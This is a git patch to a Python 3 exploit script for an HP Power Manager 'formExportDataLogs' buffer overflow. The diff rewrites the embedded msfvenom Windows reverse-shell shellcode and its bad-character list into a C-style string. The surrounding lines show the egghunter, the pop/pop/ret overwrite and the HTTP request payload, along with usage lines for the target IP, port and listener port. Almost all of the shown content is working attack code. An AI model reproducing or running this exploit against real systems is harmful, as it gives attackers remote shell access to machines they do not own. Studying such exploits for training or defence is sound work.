From c805eedd524068168e7c4c797478641b3e3238cb Mon Sep 17 00:00:00 2001
From: 0xG0ez <0xG0ez@>
Date: Sat, 8 Mar 2025 14:24:58 +0100
Subject: [PATCH] Fix broken bad characters

Use c-style variable
---
 hp_pm_exploit_p3.py | 68 ++++++++++++++++++++++-----------------------
 1 file changed, 34 insertions(+), 34 deletions(-)

diff --git a/hp_pm_exploit_p3.py b/hp_pm_exploit_p3.py
index 0d6ed51..d2bad90 100644
--- a/hp_pm_exploit_p3.py
+++ b/hp_pm_exploit_p3.py
@@ -1,7 +1,7 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 # This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
 # For the original script visit: https://github.com/Muhammd/HP-Power-Manager
-#
+#
 # Usage: python3 hp_pm_exploit_p3.py
 # : ip address the HP Power Manager is running on
 # : port the application is running on
@@ -23,41 +23,41 @@ LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta
 if (len(argv)>4): raise IndexError
-except IndexError:
+except IndexError:
 print("Usage: python3 %s " % argv[0])
 print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
 exit()
-#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
-egg = "b33fb33f"
-buf = egg
-buf += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
-buf += "\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
-buf += "\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
-buf += "\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
-buf += "\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
-buf += "\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
-buf += "\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
-buf += "\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
-buf += "\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
-buf += "\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
-buf += "\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
-buf += "\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
-buf += "\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
-buf += "\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
-buf += "\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
-buf += "\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
-buf += "\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
-buf += "\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
-buf += "\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
-buf += "\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
-buf += "\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
-buf += "\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
-buf += "\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
-buf += "\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
-buf += "\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
-buf += "\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
-buf += "\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d"
+#msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4411 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c
+# add reverse shell after 'b33fb33f'
+buf = ("b33fb33f"
+"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+"\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
+"\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
+"\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
+"\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
+"\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
+"\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
+"\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
+"\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
+"\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
+"\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
+"\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
+"\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
+"\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
+"\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
+"\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
+"\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
+"\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
+"\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
+"\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
+"\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
+"\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
+"\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
+"\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
+"\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
+"\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
+"\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d")
 #egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
 hunter = b""
@@ -67,7 +67,7 @@ buffer = b"\x41" * (721 -len(hunter))
 buffer += b"\x90"*30 + hunter
-buffer += b"\xeb\xc2\x90\x90" #JMP SHORT 0xC2
+buffer += b"\xeb\xc2\x90\x90" #JMP SHORT 0xC2
 buffer += b"\xd5\x74\x41" #pop esi # pop ebx # ret 10 (DevManBE.exe)
 content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)